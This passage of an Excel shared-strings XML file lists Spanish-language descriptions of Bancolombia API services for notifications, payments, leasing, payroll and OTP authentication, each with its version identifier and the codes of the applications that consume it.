    <t>El servicio NotificacionArchivoPagos tiene el objetivo de realizar la notificación al proveedor pagos, para informarle que tiene un archivo de lotes en una ruta Ifs, para que él la pueda tomar y posteriormente pueda realizar la ejecución del archivo en lote.</t>
  </si>
  <si>
    <t>Notificacion Credito Consumo</t>
  </si>
  <si>
    <t>El servicio permite responder al canal Ventas Digitales las diferentes interacciones y pasos que tiene el flujo de solicitud de Credito de consumo.</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio NotificacionCreditoConsumo permite notificar por parte de Bizagi al aplicativo front los avances de cada uno de los pasos del flujo de crédito de consumo, habilitando así el intercambio de información entre las dos partes hasta completar la venta del producto. </t>
  </si>
  <si>
    <t>AW0937 _x000D_
AW1285001 _x000D_
AW0856</t>
  </si>
  <si>
    <t>Notificacion Entrega Producto Debito</t>
  </si>
  <si>
    <t>El servicio Notificar Entrega - Tarjeta Debito - permite llevar a cabo las siguientes funcionalidades:  • Permite al proveedor logístico, notificar la entrega de la tarjeta débito, aclarando los datos finales de entrega.</t>
  </si>
  <si>
    <t>APIC _x000D_
AW1285001 _x000D_
NU0104001 _x000D_
NU0170001</t>
  </si>
  <si>
    <t>Notificacion Envio Reporte Leasing</t>
  </si>
  <si>
    <t>El servicio Notificación Envío Reporte Leasing permitirá a los consumidores hacer solicitudes al back de leasing para la generación y envío de algún tipo de reporte de operaciones que por su volumen de información deba ser entregado en buzón seguro.</t>
  </si>
  <si>
    <t>Notificacion Envio Reporte Prestamo</t>
  </si>
  <si>
    <t xml:space="preserve"> Este servicio permite notificar que se debe generar y enviar a buzón seguro, el reporte de los préstamos asociados al convenio</t>
  </si>
  <si>
    <t>Notificacion Fin Procesamiento Archivos Depositos</t>
  </si>
  <si>
    <t>Provee a las diferentes aplicaciones que estén interesadas en saber cuándo depósitos termina de procesar el archivo que notificaron con anterioridad a depósitos a través del servicio ProcesamientoArchivosDepositos.</t>
  </si>
  <si>
    <t>AW01065 _x000D_
SAI _x000D_
BVD _x000D_
SUF _x000D_
AW1078</t>
  </si>
  <si>
    <t>Notificacion Novedad Mesa Ayuda</t>
  </si>
  <si>
    <t>Este servicio permite radicar novedades en la aplicación TPClient a través de la virtualización del servicio WSRegistroNovedades que expone Teleperformance.</t>
  </si>
  <si>
    <t>AW1142001 _x000D_
TP</t>
  </si>
  <si>
    <t>Notificacion Respuesta Documental</t>
  </si>
  <si>
    <t>El servicio tiene como alcance recibir notificación de respuesta por cada caso de estudio de crédito, del proceso documental entregado por Kofax y expuesto a Bizagi con la confirmación de los documentos digitalizados exitosamente además de las devoluciones por inconsistencias.</t>
  </si>
  <si>
    <t>Notificacion Transacciones Nequi</t>
  </si>
  <si>
    <t>El servicio NotificacionTransaccionesNequi, representa la virtualización en el appliance de WebSphere DataPower de una funcionalidad que expone la capa medidora de NEQUI para la recepción de una notificación relacionada con transacciones entre clientes de Bancolombia y clientes de Nequi.</t>
  </si>
  <si>
    <t>Finacle (Banco Digital)_AW1011001</t>
  </si>
  <si>
    <t>SVP</t>
  </si>
  <si>
    <t>Notificacion Validacion Biometrica</t>
  </si>
  <si>
    <t>Servicio a través del cual la aplicación de validación biométrica (Biovoz) notificará al usuario, acciones tales como la regeneración de un token o generación de una nueva contraseña. De igual forma notifica a Teleperformance la acción realizada por parte del usuario.</t>
  </si>
  <si>
    <t>AW1142001 _x000D_
AW1081001</t>
  </si>
  <si>
    <t>Notificar Estado Solicitud De Credito_BB12</t>
  </si>
  <si>
    <t>El servicio les permite a los consumidores, enviar a Gestión Documental o a BIZAG  información relacionada con el estado de los documentos asociados a una solicitud de un crédito de consumo, el cual es conocido como una notificación.</t>
  </si>
  <si>
    <t>AW0499 _x000D_
AW1176 _x000D_
AW0856 _x000D_
Carvajal</t>
  </si>
  <si>
    <t>Notification Generate Report</t>
  </si>
  <si>
    <t>Notification To Generate Report</t>
  </si>
  <si>
    <t>Tec-Loans-Notification-To-Generate-Report</t>
  </si>
  <si>
    <t>API que permite notificar que se debe generar y enviar a buzón seguro</t>
  </si>
  <si>
    <t>NotificacionEnvioReportePrestamo/V1.0</t>
  </si>
  <si>
    <t>PortalLibranzas_AW0360007 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Notifications</t>
  </si>
  <si>
    <t>Notifications - Alert and Notifications Information</t>
  </si>
  <si>
    <t>notifications-alert-and-notifications-information</t>
  </si>
  <si>
    <t>API que permite consultar la siguiente información de un cliente:  - Mecanismo por medio el cual un cliente Bancolombia esta enrolado a clave dinámica, el cual puede variar entre ODA y Softoken.  -  Datos de contacto que fueron proporcionados por un cliente Bancolombia y/o un cliente de Bancolombia a la mano, como lo son níºmero de celular y correo electrónico autorizados para recibir notificaciones.</t>
  </si>
  <si>
    <t>ConsultaDatosAlertasyNotificaciones/V1.0</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001 _x000D_
 Recargas_AW1300001 _x000D_
 EDPYME_AW1170 _x000D_
 Desbloqueo-Clave-Dinamica-TDC_NU0100001 _x000D_
 Autorizador-Digitalizacion-Tarjetas_NU0103001 _x000D_
 EASYHOME_NU0004001 _x000D_
 JornadaDepositos_NU0104001 _x000D_
 aprobaciones_AW0360007 _x000D_
 JornadaDepositos_NU0170001 _x000D_
 JornadaPagos_AW1316001 _x000D_
 CryptoAssetsGMN_NU0094001 _x000D_
 LoansOffer_NU0102001 _x000D_
 BancolombiaPay_AW1435001 _x000D_
 HelpContacts_NU0106001 _x000D_
 SecurityOTP_NU0209001 _x000D_
 ALM_AW0955001 _x000D_
 BNPL_NU0287001 _x000D_
 VINCUTRANS_NU0034001 _x000D_
 PagoSinFriccionQrInteroperable_AW1315001 _x000D_
 PreaprobadosSucursales_AW1299001</t>
  </si>
  <si>
    <t>notifications-alert-and-notifications-subscription</t>
  </si>
  <si>
    <t>Notifications - Alert and Notifications Subscription</t>
  </si>
  <si>
    <t>notifications-send-alerts-and-notifications</t>
  </si>
  <si>
    <t>API que permite realizar la inscripción de un cliente al sistema de alertas y notificaciones, al momento de la aperturación de un producto en Bancolombia. El cliente podrá inscribirse entregando níºmero de celular, correo electrónico o ambos datos.</t>
  </si>
  <si>
    <t>GestionAlertasyNotificaciones/V1.0</t>
  </si>
  <si>
    <t>Notifications - Send Alerts And Notifications</t>
  </si>
  <si>
    <t>La presente API permite obtener la información para crear la estructura de un mensaje de alertas y notificaciones que deba enviarse a un cliente al momento de realizar una transacción. Estas transacciones se encuentran definidas en la sucursal virtual personas y existen también otro tipo de alertas que son obligatorias así­ el cliente no las haya configurado. Esta API consumirá el servicio EnvioAlertasyNotificaciones, que a su vez invoca la aplicación de alertas y notificaciones almacenada en el módulo PCC en el Iseries.</t>
  </si>
  <si>
    <t>EnvioAlertasYNotificaciones/V1.0</t>
  </si>
  <si>
    <t>Novedades Tarjetas Credito</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite realizar diferentes tipos de novedades sobre el producto Tarjetas Crédito, los cuales se listan a continuación.  Crear tarjeta de crédito por uso inmediato </t>
  </si>
  <si>
    <t>Novedades Tarjetas Debito</t>
  </si>
  <si>
    <t xml:space="preserve">Este servicio permite realizar diferentes tipos de novedades sobre el producto Tarjetas Débito, los cuales se listan a continuación.  Asociar tarjeta pre expedida  Crear tarjeta personalizada (pendiente)   Bloquear tarjeta (pendiente)   Desbloquear tarjeta </t>
  </si>
  <si>
    <t>Security</t>
  </si>
  <si>
    <t>OAuth - Provider from OTP</t>
  </si>
  <si>
    <t>oauth-otp</t>
  </si>
  <si>
    <t>GeneracionToken/V1.0</t>
  </si>
  <si>
    <t>CHATBOT _x000D_
 Vinculación Digital _x000D_
 Dummy _x000D_
 Remitly APP1_RTY _x000D_
 BC Portal de Contenido_AW1218001 _x000D_
 TransferWise_TNW</t>
  </si>
  <si>
    <t>OAuth - Provider from OTP Pymes</t>
  </si>
  <si>
    <t>oauth-otp-pymes</t>
  </si>
  <si>
    <t>Proveedor de OAuth2 para autenticación con One Time Password (OTP) para Pymes</t>
  </si>
  <si>
    <t>Obligaciones Hipotecario</t>
  </si>
  <si>
    <t>Este servicio expone una capacidad que permite realizar consultas detalladas para obligaciones hipotecarias.</t>
  </si>
  <si>
    <t>AW1294001</t>
  </si>
  <si>
    <t>Obligations</t>
  </si>
  <si>
    <t>Obligations - Maintenance</t>
  </si>
  <si>
    <t>obligations-maintenance</t>
  </si>
  <si>
    <t>La API expone una capacidad que permite rediferir un préstamo en el aplicativo core.</t>
  </si>
  <si>
    <t>MantenimientoObligacionesCartera/V1.0</t>
  </si>
  <si>
    <t>Oferta Comercial Tarjetas Credito</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Oferta Comercial Tarjetas Crédito permite a los consumidores calcular una oferta de tarjetas de crédito para un cliente (inicialmente estará disponible sólo para personas, pero la idea es que sirva posteriormente también para PYME).  Para calcular dicha oferta, el servicio funcionará como un orquestador para recuperar información necesaria, tal como: el segmento y sub segmento del cliente, relación cliente-banco, lista de tarjetas que tiene actualmente el cliente, validación para saber si el cliente se encuentra bajo un convenio de nómina.  Después de recopilar la información necesaria, esta información viaja a Medios de Pago quien realiza el cálculo de la oferta, y retorna una lista de tarjetas que se pueden ofrecer al cliente. </t>
  </si>
  <si>
    <t>Oferta Cuentas Depositos</t>
  </si>
  <si>
    <t xml:space="preserve">El servicio Oferta Cuentas Depósitos permite consultar la información de la oferta que ofrece el producto de depósitos como por ejemplo los planes actuales para cuentas de ahorro y corriente. </t>
  </si>
  <si>
    <t>PRODUCTORCONSUMIDOR _x000D_
NU0170001 _x000D_
AW0000852</t>
  </si>
  <si>
    <t>Offer</t>
  </si>
  <si>
    <t>Offer - Offers</t>
  </si>
  <si>
    <t>offer-offers</t>
  </si>
  <si>
    <t>El producto Api de Ofertas permite consultar y listar los detalles de toda la información de las ofertas del core no financiero generados para los clientes Bancolombia. Permitiéndole a los consumidores consultar información que puede mostrarse en los distintos portales del banco, favoreciendo a clientes ya que los acerca a ofertas de productos que cumplen su perfil y ayudando a los productores a encontrar nuevas vitrinas de exposición de sus productos.</t>
  </si>
  <si>
    <t>CGC_NU0014001 _x000D_
 Portal Contenidos Bancolombia_AW1218001</t>
  </si>
  <si>
    <t>Operation Leasing</t>
  </si>
  <si>
    <t>Operation Leasing - Information</t>
  </si>
  <si>
    <t>operation-leasing-information</t>
  </si>
  <si>
    <t>La API Operation Leasing - Information permitirá a los consumidores realizar la consulta de una o varias obligaciones de Leasing (Financiero, Arrendamiento Operativo u otro) y obtener la información correspondiente al producto, estado y condiciones generales asociados a la operación.</t>
  </si>
  <si>
    <t>SVETDL_AW0360006 _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 ModuloSVELeasing_AW0360006</t>
  </si>
  <si>
    <t>Pagar Credito Hipotecario</t>
  </si>
  <si>
    <t>Permitir Pagar los Créditos Hipotecarios tanto para Personas Naturales (Individuales) como de Constructor, por medio de varios canales como son la Sucursal Virtual Personas (SVP) para créditos individual y Canales Físicos (Golf) para créditos Constructor</t>
  </si>
  <si>
    <t>SCI _x000D_
SVP _x000D_
GDE _x000D_
AW01010 _x000D_
AUD</t>
  </si>
  <si>
    <t>Pagar Tarjeta Credito</t>
  </si>
  <si>
    <t>Realizar pagos de tarjeta de crédito propia y no propia para filiales del exterior (sólo para las filiales Panamá/Cayman), los pagos que se hacen por la sucursal virtual de las tarjetas de crédito del Banco de un cliente o los pagos que este hace de las tarjetas de un tercero.</t>
  </si>
  <si>
    <t>Paginacion Fondos Fiduciarios</t>
  </si>
  <si>
    <t>Este componente permite recorrer la estructura de los datos de los servicios de ConsultaInformacionFondosFiduciarios y ConsultaSaldosFondosFiduciarios, con el propósito de controlar las paginaciones y entregar las consultas solicitadas por el consumidor.</t>
  </si>
  <si>
    <t>Pago Con Transferencia</t>
  </si>
  <si>
    <t>El servicio Pago Con Transferencia, permite realizar una trasferencia entre cuentas bancolombia, con cobro de comision y su repectivo iva.</t>
  </si>
  <si>
    <t>BDT _x000D_
AW1165 _x000D_
APICONNECT</t>
  </si>
  <si>
    <t>Pago Credito Hipotecario</t>
  </si>
  <si>
    <t>Servicio que permite pagar los créditos hipotecarios tanto para personas naturales (individuales) como de constructor, por medio de varios canales como son la Sucursal Virtual Personas (SVP) para créditos individual y Canales Físicos: Golf (SCI, SAI) para créditos constructor, inicialmente, dichas consultas traerán la información desde FINACLE.</t>
  </si>
  <si>
    <t>SVE _x000D_
NU0004001 _x000D_
DEVELOPSOATEST _x000D_
NU0166001</t>
  </si>
  <si>
    <t>Pago De Facturas</t>
  </si>
  <si>
    <t>Registrar el pago de una factura en el sistema de recaudos, incluyendo consulta del convenio del recaudador, validaciones de referencia y consulta del monto de una factura, sin importar donde se encuentra la información del valor (base de datos interna o externa).</t>
  </si>
  <si>
    <t>SAI _x000D_
PAC _x000D_
SCI _x000D_
CNB _x000D_
ALM _x000D_
SVP _x000D_
ALL _x000D_
GDE _x000D_
APP _x000D_
PSE _x000D_
SVE _x000D_
ATM _x000D_
AUD _x000D_
FAC _x000D_
AW0360</t>
  </si>
  <si>
    <t>Pago Factura</t>
  </si>
  <si>
    <t>Servicio que permite pagar facturas inscritas debitando el dinero de la cuenta, realiza la afectación en tiempo real del saldo del cliente. Adicionalmente permite actualizar el valor a pagar de la factura si esta no tiene validación de base de datos._x005F_x000D_ Verifica la pertenencia de la cuenta, adicionalmente también permite validar y actualizar de ser necesario la personalización de topes, límites de pagos a terceros, límites de transferencias.</t>
  </si>
  <si>
    <t>Pago Prestamos</t>
  </si>
  <si>
    <t>El servicio permite realizar el pagos de créditos comerciales, enviando al TEF3 de la transacción 001, la cuenta, el tipo de cuenta y el valor del préstamo de cliente para aplicar su pago, retornando el número de pagaré.</t>
  </si>
  <si>
    <t>AW1170 _x000D_
AW0955 _x000D_
AW0955001</t>
  </si>
  <si>
    <t>Transacción encargada de realizar pagos de Préstamos, está en la capacidad de realizar pagos totales, parciales o cuota. La transacción realiza el débito a la cuenta origen y realiza el pago del préstamo, en caso de algún fallo en la misma, realiza el reverso del débito, la transacción verifica que la cuenta origen para realizar el débito.</t>
  </si>
  <si>
    <t>Pago Tarjeta Credito</t>
  </si>
  <si>
    <t>El servicio Pago Tarjeta Crédito tiene como objetivo permitir el pago (pago mínimo, pago total y otro valor) de tarjetas de crédito propias y no propias en dólares y pesos.</t>
  </si>
  <si>
    <t>Party Authentication</t>
  </si>
  <si>
    <t>Party Authentication - Password Management</t>
  </si>
  <si>
    <t>party-authentication-password-management</t>
  </si>
  <si>
    <t xml:space="preserve">Permite la gestión, administración y consultas que se puedan realizar sobre la clave Banco o primera clave del cliente. </t>
  </si>
  <si>
    <t>GestionClaveCliente/V1.0</t>
  </si>
  <si>
    <t>AppInversiones_AW1185001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 MascaraTransaccional_NU0021001</t>
  </si>
  <si>
    <t>Payment Execution</t>
  </si>
  <si>
    <t>Payment Execution - Payments</t>
  </si>
  <si>
    <t>payment-execution-payments</t>
  </si>
  <si>
    <t>La API Payment Execution - Payments tiene el objetivo de realizar la consulta general y detallada del histórico de lotes de pagos, que ha realizado una empresa afiliada a sus beneficiarios (proveedor o empleado).</t>
  </si>
  <si>
    <t>EDPYME_AW1170 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 Horus_AW1258011</t>
  </si>
  <si>
    <t>Payment Information</t>
  </si>
  <si>
    <t>payment-information</t>
  </si>
  <si>
    <t>El API es la interfaz de un servicio de composición entre los servicios de datos del cliente y de la consulta básica de obligaciones, que permite obtener los datos necesarios para que un cliente de Sufi pueda consultar los datos de sus próximos pagos a realizar desde una lí­nea telefónica bajo la tecnologí­a de respuesta de voz interactiva (IVR), este servicio de tarea se hace bajo el contexto del proveedor del Konecta.</t>
  </si>
  <si>
    <t>Payment Leasing</t>
  </si>
  <si>
    <t>Payment Leasing - Information</t>
  </si>
  <si>
    <t>payment-leasing-information</t>
  </si>
  <si>
    <t>La API Payment Leasing - Information permitirá a los consumidores realizar la consulta de los Planes de pagos de una operación especí­fica y obtener la información correspondiente del pago al dí­a de hoy, próximo pago  a vencerse o los pagos vencidos asociados a una obligación de Leasing (Financiero, Arrendamiento Operativo u otro).</t>
  </si>
  <si>
    <t>SVETDL_AW0360006 _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 PORTALCOBRANZA_AW1294001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 TransaccionPago_AW0360006 _x000D_
 Monitoreo_Payment_Leasing _x000D_
 Monitoreo_Payment_Leasing _x000D_
 ModuloSVELeasing_AW0360006</t>
  </si>
  <si>
    <t>Payment Leasing - Payment Management</t>
  </si>
  <si>
    <t>payment-leasing-payment-management</t>
  </si>
  <si>
    <t>Este servicio permite realizar la gestión de un pago de Leasing , la aplicación de un pago y la gestión de transacción necesaria para un pago.</t>
  </si>
  <si>
    <t>Payment Leasing - Payment Transaction Leasing</t>
  </si>
  <si>
    <t>payment-leasing-payment-transaction-leasing</t>
  </si>
  <si>
    <t>Este servicio permite realizar la gestión de transacción de un pago completo, desde el débito de una cuenta Banco de un cliente, anulación y aplicación de pagos en el core de Delfin.</t>
  </si>
  <si>
    <t>Payment Leasing - Retrieve Payments Condition</t>
  </si>
  <si>
    <t>payment-leasing-retrieve-payments-condition</t>
  </si>
  <si>
    <t>Esta API cuenta con la consulta de condiciones de pago en una operación leasing</t>
  </si>
  <si>
    <t>Payment Order</t>
  </si>
  <si>
    <t>Payment Order - Payment file</t>
  </si>
  <si>
    <t>payment-order-payment-file</t>
  </si>
  <si>
    <t>El API Payment Order - Payment file tiene el objetivo de realizar la notificación al proveedor pagos, para informarle que tiene un archivo de lotes en una ruta Ifs, para que él la pueda tomar y posteriormente puede realizar la ejecución del archivo en lote.</t>
  </si>
  <si>
    <t>Payment Request</t>
  </si>
  <si>
    <t>Payment Request - Batch Information</t>
  </si>
  <si>
    <t>payment-request-batch-information</t>
  </si>
  <si>
    <t>El API Payment Request - Batch information permitirá conocer la información de los lotes cargados por un cliente pagado, con diferentes opciones de filtro que facilitan la busqueda.</t>
  </si>
  <si>
    <t>ConsultaLotesDePago/V1.0</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR _x000D_
 APIC_PRODUCTORCONSUMIDOR _x000D_
 APIC_PRODUCTORCONSUMIDOR _x000D_
 SVE_NU0153001 _x000D_
 APIJ_PRODUCTORCONSUMIDOR _x000D_
 Pruebajason _x000D_
 Horus_AW1258011</t>
  </si>
  <si>
    <t>Payment Request - Management</t>
  </si>
  <si>
    <t>payment-request-management</t>
  </si>
  <si>
    <t>El API Payment Request - Management permitirá realizar la gestión de los pagos al momento de su creación y posterior al pago, realizar acciones como anulaciones o reaplicación de pagos que tuvieron inconvenientes en el proceso. Tambien permitira procesar dispersion de pagos (Procesamiento de lotes de pago)</t>
  </si>
  <si>
    <t>GestionDePagos/V1.0</t>
  </si>
  <si>
    <t>Payment Request - Payments Information</t>
  </si>
  <si>
    <t>payment-request-payment-information</t>
  </si>
  <si>
    <t>Este Produto API permite realizar la consulta de todos los pagos en el sistema de pagos.</t>
  </si>
  <si>
    <t>ConsultaDePagos/V1.0</t>
  </si>
  <si>
    <t>payment_Initiation</t>
  </si>
  <si>
    <t>Payments - QR Codes Management</t>
  </si>
  <si>
    <t>payments-qr-codes-management</t>
  </si>
  <si>
    <t>El api Payments - QR Codes Management permite generar un código QR (código, no imagen) que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P). Adicionalmente se puede consultar la información de los QR generados por un comercio y la información de un QR en especí­fico.  El proveedor de este servicio es Todo1.</t>
  </si>
  <si>
    <t>Transferencias y Recargas</t>
  </si>
  <si>
    <t>Payments</t>
  </si>
  <si>
    <t>Payments - QR Management</t>
  </si>
  <si>
    <t>payments-qr-management</t>
  </si>
  <si>
    <t>El api Payments - QR Management permite generar un QR que se puede utilizar para recaudos (diferente al QR que se genera en la APP para transferencias P2P), dando la opción de generar una notificación adicional al momento del pago (diferente a las notificaciones por defecto de Aletas y Notificaciones). Adicionalmente permite solicita el enví­o fí­sico de un QR (en hablador), consultar la información de los QR generados por un comercio y la información de un QR en especí­fico.</t>
  </si>
  <si>
    <t>GestionaNegocios_AW1302001 _x000D_
 GestorCanal_NU0014001 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 Gestiona_AW1302001 _x000D_
 Nequi_AW1011 _x000D_
 Portal Contenidos Bancolombia_AW1218001 _x000D_
 ALM_AW0955001 _x000D_
 HabitatAdministraciones_NU0113001 _x000D_
 MascaraTransaccional_NU0021001 _x000D_
 One Click Payment_NU0199001 _x000D_
 Payments_AW0012345 _x000D_
 APP-PERSONAS_NU0146001</t>
  </si>
  <si>
    <t>Payments - QR Payment</t>
  </si>
  <si>
    <t>payments-qr-payment</t>
  </si>
  <si>
    <t>Payments - Transaction Logs Management</t>
  </si>
  <si>
    <t>payments-bancolombia-logs-management</t>
  </si>
  <si>
    <t>El api Payments - Transaction Logs Management permite grabar y consultar la información relacionada con las transacciones realizadas por los clientes en los diferentes servicios de aceptación de medios de pago.</t>
  </si>
  <si>
    <t>Payments - Transfer</t>
  </si>
  <si>
    <t>payments-transfer</t>
  </si>
  <si>
    <t>Payments - Transfer, permite realizar una transferencia entre cuentas o la anulación de la misma, dicha transferencia se comporta como un pago, tiene en cuenta temas como comisiones, reporterí­a, balance, información de la venta, y del producto</t>
  </si>
  <si>
    <t>Payments ACH Fulfillment</t>
  </si>
  <si>
    <t>Payments ACH Fulfillment - Customer Enrollment</t>
  </si>
  <si>
    <t>payments-ach-fulfillment-customer-enrollment</t>
  </si>
  <si>
    <t>El API permite vincultar y desvincular las cuentas activas de ahorro y corriente del cliente Bancolombia con el níºmero de celular para realizar las transferencias Inmediatas en ACH en Lí­nea. Tambien permite consultar las cuentas vinculadas de un cliente con un numero de celular.</t>
  </si>
  <si>
    <t>Payments ACH Fulfillment - Transfer Management</t>
  </si>
  <si>
    <t>payments-ach-fulfillment-transfer-management</t>
  </si>
  <si>
    <t>El API permite realizar las siguientes operaciones de (Envió, recibo y solicitud dinero) de forma inmediata para realizar transferencias en lí­nea a cuentas Bancolombia y otros bancos</t>
  </si>
  <si>
    <t>Employee Payroll</t>
  </si>
  <si>
    <t>Payroll - Customer</t>
  </si>
  <si>
    <t>payroll-customer</t>
  </si>
  <si>
    <t>La Api Employee payroll - Payroll customer permite a las pequeí±as y grandes empresas, realizar su inscripción de cliente (persona natural o jurí­dica) al servicio de pago de nómina. Lo anterior con el fin de tener el registro de dicho cliente en el sistema de pagos para que posteriormente el cliente pueda realizar el pago de su nómina. Este servicio también permite consultar si el cliente se encuentra registrado en pago de nómina.</t>
  </si>
  <si>
    <t>EDPYME_AW1170 _x000D_
 MonitoreoDCM_NU0084001 _x000D_
 JornadaDepositos_NU0170001</t>
  </si>
  <si>
    <t>Payroll Agreement</t>
  </si>
  <si>
    <t>Payroll Agreement - Information</t>
  </si>
  <si>
    <t>payroll-agreement-information</t>
  </si>
  <si>
    <t xml:space="preserve">El API Payroll Agreement - Information permitirá listar la información de los convenios de nómina a partir del empleador, pagador o beneficiario. Como resultado de la consulta se obtendrá información del plan, estado grupo y porcentaje de cobro que asume el empleador en la cuota de manejo </t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR _x000D_
 APP_PRODUCTORCONSUMIDOR _x000D_
 JornadaDepositos_NU0170001</t>
  </si>
  <si>
    <t>Payroll And Supplier Payment</t>
  </si>
  <si>
    <t>Payroll And Supplier Payment - Payers</t>
  </si>
  <si>
    <t>payroll-and-supplier-payment-payers</t>
  </si>
  <si>
    <t>El Payroll And Supplier Payment - Payers permite realizar la gestión con la información de los clientes pagadores</t>
  </si>
  <si>
    <t>GestionClientePagador/V1.0</t>
  </si>
  <si>
    <t>APP_PRODUCTORCONSUMIDOR _x000D_
 APIC_PRODUCTORCONSUMIDOR _x000D_
 pruebacaida _x000D_
 Pruebajason _x000D_
 APIJ_PRODUCTORCONSUMIDOR</t>
  </si>
  <si>
    <t>Payroll And Supplier Payment-Beneficiaries</t>
  </si>
  <si>
    <t>payroll-and-supplier-payment-beneficiaries</t>
  </si>
  <si>
    <t>El API Payroll and Supplier Payment - Beneficieries permitirá realizar la gestión sobre los beneficiarios de los pagadores, podrán realizar procesos de inscripción de beneficiarios y consultas, pueden ser beneficiario con cuenta en el banco u otras entidades, para pagos por lotes. Esté aplica para los recaudadores que prefieren por seguridad realizar pagos a beneficiarios ya inscritos, en caso de no estar inscrito el pago se rechazará</t>
  </si>
  <si>
    <t>GestionBeneficiario/V1.0</t>
  </si>
  <si>
    <t>Payroll Management</t>
  </si>
  <si>
    <t>Payroll Management - Companies</t>
  </si>
  <si>
    <t>payroll-management-companies</t>
  </si>
  <si>
    <t>API que permite la gestión de las empresas en el producto de gestion nomina. Inicialmente las empresas se podran consultar y actualizar. La creación de esta entidad se realiza automaticamente con el API de enrolamiento al producto.</t>
  </si>
  <si>
    <t>nomina app</t>
  </si>
  <si>
    <t>EDPYME_AW1170 _x000D_
 BC_Herramientas_MonitoreoPrd</t>
  </si>
  <si>
    <t>Payroll Management - Contracts and wages of employees</t>
  </si>
  <si>
    <t>payroll-management-contracts-and-wages-of-employees</t>
  </si>
  <si>
    <t>Gestión de contratos y salarios de los empleados de la empresa, con esta API se pueden crear, consultar, modificar y eliminar contratos y salarios de empleados en el producto de gestión de nómina, los empleados están relacionados con una empresa, uno o varios contratos y salarios.</t>
  </si>
  <si>
    <t>Payroll Management - Contracts settlement</t>
  </si>
  <si>
    <t>payroll-management-contracts-settlement</t>
  </si>
  <si>
    <t>Gestión de liquidación definitiva de contratos de empleados, la liquidación consiste en terminar la relación laboral con un empleado, esto solo aplica para  EMPLEADOS y PENSIONADOS, los otros contratos se pueden terminar pero las personas no son liquidadas.</t>
  </si>
  <si>
    <t>Payroll Management - Customers enrollment</t>
  </si>
  <si>
    <t>payroll-management-customers-enrollment</t>
  </si>
  <si>
    <t>Gestión de enrolamiento de clientes, con esta API se puede enrolar un cliente(pyme, empresa...) al procduto de gestion de nominas.</t>
  </si>
  <si>
    <t>Payroll Management - Employees</t>
  </si>
  <si>
    <t>payroll-management-employees</t>
  </si>
  <si>
    <t>Gestión de los empleados de la empresa, con esta API se pueden crear, consultar, modificar y eliminar empleados de una empresa en el producto de gestion de nomina, los empleados estan relacionados con una empresa, uno o varios contratos y salarios.</t>
  </si>
  <si>
    <t>Payroll Management - Locations</t>
  </si>
  <si>
    <t>payroll-management-locations</t>
  </si>
  <si>
    <t>Gestión de las sedes de la empresa, con esta API se pueden crear, consultar, modificar y eliminar sedes de una empresa en el producto de gestion de nomina.</t>
  </si>
  <si>
    <t>Payroll Management - Payroll concepts</t>
  </si>
  <si>
    <t>payroll-management-payroll-concepts</t>
  </si>
  <si>
    <t>Permite la gestión de los conceptos de nómina, estos son los diferentes conceptos que se usan para agregar novedades a la nómina e identificar los diferentes valores que corresponden. Estos pueden ser generales a nivel nacional que aplican para todas las empresas como salud, pensión, etc. y hay otros que pueden ser creados por las empresas de manera especí­fica. Inicialmente solo se podrán consultar los conceptos de nómina generales a nivel nacional pero posteriormente podrí­a implementarse gestion de conceptos especí­ficos para cada empresa.</t>
  </si>
  <si>
    <t>Payroll Management - Payroll novelties management</t>
  </si>
  <si>
    <t>payroll-management-payroll-novelties-management</t>
  </si>
  <si>
    <t>Gestión de las novedades de nómina de una empresa, con esta API se pueden crear, consultar y modificar elementos de nómina diferentes tipos. Los elementos de nómina son los que permiten agregar novedades salariales, no salariales o deducciones a una nómina y están directamente relacionados a un concepto de nómina, estas pueden ser recurrentes, es decir de ejecución periódico o aplicables a una nómina especifica de un periodo.</t>
  </si>
  <si>
    <t>Payroll Management - Payrolls</t>
  </si>
  <si>
    <t>payroll-management-payrolls</t>
  </si>
  <si>
    <t>Permite la consulta y actualización de la nomina especifica de un empleado, en la nómina esta toda la información de lo pagado al empleado, sus deducciones, retenciones, aportes a seguridad social entre otros. Inicialmente solos se habilita el metodo para consulta de colilla de pago pero posteriormente se habilitarán los demas metodos de consulta y modificación.</t>
  </si>
  <si>
    <t>Payroll Management - Periods</t>
  </si>
  <si>
    <t>payroll-management-periods</t>
  </si>
  <si>
    <t>Permite la consulta de los perí­odos de liquidación de la nómina de una empresa, los perí­odos hacen referencia al tiempo en el cual se liquida la nómina de la empresa, estos pueden ser quincenales o mensuales dependiendo de la configuración de la empresa. Los endpoints de perí­odo permiten consultar el listado de los perí­odos de la empresa o consultar la información especí­fica de cada uno.</t>
  </si>
  <si>
    <t>Payroll Management - Subscription payment management</t>
  </si>
  <si>
    <t>payroll-management-subscription-payment-management</t>
  </si>
  <si>
    <t>API que permite la gestión del pago de la suscripción de las empresas que utilizan el producto de gestion nomina. Inicialmente se expone endpoint para enviar la cuenta desde la cual se realizará el debito automatico para el pago.</t>
  </si>
  <si>
    <t>Tec- Personal Finance</t>
  </si>
  <si>
    <t>Personal finance  Admin - Management</t>
  </si>
  <si>
    <t>personal-finance-admin-management</t>
  </si>
  <si>
    <t xml:space="preserve">Esta API está orientada al manejo de las FINANZAS PERSONALES de los clientes del banco. Específicamente al manejo de sus gastos. Podremos gestionar a través de las operaciones incluidas en esta API las herramientas necesarias para poder conocer dichos gastos en un periodo de fechas, históricos de estos gastos y el detalle de ellos, teniendo dicha información agrupada y asociadas a unas categorías de gastos. Esto con el fin de obtener un panorama completo de las FINANZAS PERSONALES del cliente. </t>
  </si>
  <si>
    <t>MascaraTransaccional_NU0021001 _x000D_
 CapaGestionCanal_NU0014001</t>
  </si>
  <si>
    <t>Personal Finance</t>
  </si>
  <si>
    <t>Personal Finance - Admin Management</t>
  </si>
  <si>
    <t>Tabot_AW1165001 _x000D_
